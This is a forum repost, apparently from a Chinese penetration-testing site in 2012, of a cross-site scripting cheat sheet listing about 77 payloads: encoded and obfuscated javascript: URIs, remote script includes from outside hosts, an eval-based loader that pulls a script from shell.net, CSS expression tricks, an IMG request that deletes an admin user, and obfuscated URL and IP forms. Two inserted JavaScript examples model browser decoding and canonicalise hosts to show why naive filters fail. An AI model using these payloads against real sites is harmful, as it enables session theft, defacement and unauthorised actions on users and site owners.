中国网络渗透测试联盟
Title: XSS cross-site scripting attack roundup
Author: admin
Time: 2012-9-5 14:56
It seems t00ls has relatively little material on XSS. I saw something good and copied it over, in case any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive

<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the word javascript

<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the word javascript

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

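The encoded IMG variants in entries (4) to (14) and (19) all work for the same reason: the browser decodes character references in the attribute value and then strips tab, LF and CR (and leading control characters) when it parses the URL, so the scheme it sees is plain "javascript". The following is an added example, not part of the original cheat sheet, that models those two steps in a simplified form and compares a naive string-matching filter against one that decodes before inspecting the scheme. The sample tags are constructed from the entries above; the decoding rules are a model of the HTML and URL parsers, not a complete implementation of either.

```javascript
// Added example, not part of the original cheat sheet: model how a browser
// decodes an IMG SRC attribute and extracts the URL scheme, so the encoded
// payloads in entries (4)-(14) and (19) all collapse to "javascript:".
// The decoding here is a simplified model of the HTML and URL parsers.

const NAMED = { amp: "&", lt: "<", gt: ">", quot: "\"", apos: "'" };

// Decode character references in an attribute value. Numeric references
// (&#106; decimal, &#x6A; hex) are accepted with or without the trailing
// semicolon, which is what the "no semicolon" entries rely on.
function decodeAttrValue(raw) {
  return raw.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([a-z]+);/gi,
    (match, hex, dec, name) => {
      let cp;
      if (hex !== undefined) cp = parseInt(hex, 16);
      else if (dec !== undefined) cp = parseInt(dec, 10);
      else return NAMED[name.toLowerCase()] ?? match;
      return cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
    });
}

// Extract the scheme the way the URL parser does: strip leading/trailing
// C0 controls and spaces, drop ASCII tab, LF and CR anywhere, lower-case.
// That is why "jav<TAB>ascript:", "jav&#x0A;ascript:" and " &#14; javascript:"
// are all treated as the javascript: scheme.
function schemeOf(url) {
  const trimmed = url.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  const stripped = trimmed.replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

// Pull the SRC attribute value out of a single tag (quoted or unquoted).
function srcOf(tag) {
  const m = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// A naive blacklist: search the raw markup for the literal string.
function naiveBlocks(tag) {
  return /javascript:|vbscript:/i.test(tag);
}

// The check a filter actually needs: decode first, then inspect the scheme.
function normalizedBlocks(tag) {
  const raw = srcOf(tag);
  if (raw === null) return false;
  const scheme = schemeOf(decodeAttrValue(raw));
  return scheme === "javascript" || scheme === "vbscript";
}

// Constructed samples modelled on entries (4), (5), (9), (12), (13), (19)
// and one benign image for contrast (the logo.png URL is made up).
const SAMPLES = [
  "<IMG SRC=JaVaScRiPt:alert('XSS')>",
  "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')>",
  "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')>",
  "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
  "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
  "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
  "<IMG SRC=\"http://3w.org/XSS/logo.png\">",
];

// Returns, per sample, what each filter decides.
function compareFilters(samples = SAMPLES) {
  return samples.map(tag => ({
    tag,
    naive: naiveBlocks(tag),
    normalized: normalizedBlocks(tag),
  }));
}

for (const r of compareFilters()) {
  console.log(`${r.naive ? "naive:BLOCK" : "naive:pass "}  ${r.normalized ? "normalized:BLOCK" : "normalized:pass "}  ${r.tag}`);
}
```

Run it with node; the entity-encoded and whitespace-split samples pass the naive filter and are caught only after decoding, while the plain image is left alone by both. The lesson is the one the cheat sheet demonstrates from the other side: a filter that matches on the raw markup is checking a string the browser never sees.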
(16) Getting around character limits (all pieces must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes basically have no effect domestically, since there is nowhere to use them)

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY ONLOAD=alert('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter is enough)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with a comment breaking up expression

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) In Flash, ActionScript can be used to smuggle in your XSS code

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and load it

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding

<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Decimal IP

<A HREF="http://3232235521">XSS</A>

(71) Hex IP

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding

<A HREF="h&#x0A;tt	p://6&#09;6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]

<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)

<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
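Entries (70) to (73) and (76) all point at the same hosts written differently: 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 are each 192.168.0.1, 66.000146.0x7.147 is 66.102.7.147, and www.google.com. is www.google.com with the absolute-name dot. A URL filter that compares host strings literally is defeated by any of them. The following is an added example, not part of the original cheat sheet, that canonicalises these spellings before comparison. The part-parsing rules are a simplified model of the classic inet_aton behaviour browsers still honour (hex with a 0x prefix, octal with a leading 0, decimal otherwise, and a short form where the last part fills the remaining bytes); the host list is constructed from the entries above.

```javascript
// Added example, not part of the original cheat sheet: canonicalise the
// alternative IPv4 spellings from entries (70)-(73) and the trailing-dot DNS
// name from (76), so a host allow/deny list compares one canonical form.
// Part parsing is a simplified model of the inet_aton rules: "0x" prefix
// means hex, a leading "0" means octal, otherwise decimal; with fewer than
// four parts the last part supplies the remaining low-order bytes.

function parsePart(part) {
  if (/^0x[0-9a-f]+$/i.test(part)) return parseInt(part.slice(2), 16);
  // Leading zero: must be valid octal, "08" or "09" is rejected.
  if (/^0[0-9]+$/.test(part)) return /^0[0-7]+$/.test(part) ? parseInt(part, 8) : null;
  if (/^[0-9]+$/.test(part)) return parseInt(part, 10);
  return null; // not a numeric part, so the host is not an IPv4 literal
}

// Returns dotted-quad "a.b.c.d", or null when host is not an IPv4 literal.
function canonicalIPv4(host) {
  const parts = host.split(".");
  if (parts.length > 4) return null;
  const nums = parts.map(parsePart);
  if (nums.some(n => n === null)) return null;
  const last = nums.pop();
  if (nums.some(n => n > 255)) return null;   // leading parts are single bytes
  const lastBytes = 4 - nums.length;           // bytes the last part supplies
  if (last >= 2 ** (8 * lastBytes)) return null;
  let value = 0;
  for (const n of nums) value = value * 256 + n;
  value = value * 2 ** (8 * lastBytes) + last;
  // Arithmetic rather than bit shifts: values above 2^31 would go negative.
  return [24, 16, 8, 0].map(s => Math.floor(value / 2 ** s) % 256).join(".");
}

// Canonical host for comparison: lower-case, drop the trailing dot of an
// absolute DNS name, and rewrite any IPv4 literal to dotted-quad.
function canonicalHost(host) {
  let h = host.toLowerCase();
  if (h.endsWith(".")) h = h.slice(0, -1);
  return canonicalIPv4(h) ?? h;
}

// Constructed inputs taken from the entries above (192.168.0.1 is the
// address the decimal, hex and octal examples all encode).
const HOSTS = ["3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001",
               "66.000146.0x7.147", "www.google.com.", "google.com"];

for (const h of HOSTS) console.log(`${h}  ->  ${canonicalHost(h)}`);
```

Compare canonicalHost() output against the allow or deny list rather than the raw host string; the same canonical form should also be used when logging, so that the three spellings of 192.168.0.1 do not show up as three different destinations.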
中国网络渗透测试联盟 (https://www.cobjon.com/)